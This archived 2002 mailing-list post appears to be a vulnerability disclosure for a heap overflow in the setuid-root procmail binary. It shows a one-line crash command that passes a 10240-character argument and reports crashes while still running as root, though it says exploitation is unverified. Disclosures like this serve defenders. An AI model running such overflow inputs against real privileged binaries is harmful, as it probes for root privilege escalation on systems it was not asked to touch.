hi,

i found a heap overflow in procmail (up until latest) some time ago.

flatline@intra:/usr/bin$ ls -la procmail
-rwsr-xr-x 1 root mail 64344 Jun 3 2001 procmail*
flatline@intra:/usr/bin$ ./procmail `perl -e '{print "A"x10240}'`=A
procmail: Exceeded LINEBUF
Segmentation fault
flatline@intra:/usr/bin$

at first it seemed to properly drop privs before segging, but not too long ago i managed to make it crash while it still had euid 0.

segfaults have been seen on red hat/slackware linux and bsd variants. successful exploitation has not been verified.

/ flatline

greets fly out to fc, zeno, xistence, thewolf, #gold, #!xpc and everyone who felt left out.
This archive was generated by hypermail 2b30 : Wed Jun 19 2002 - 00:47:25 PDT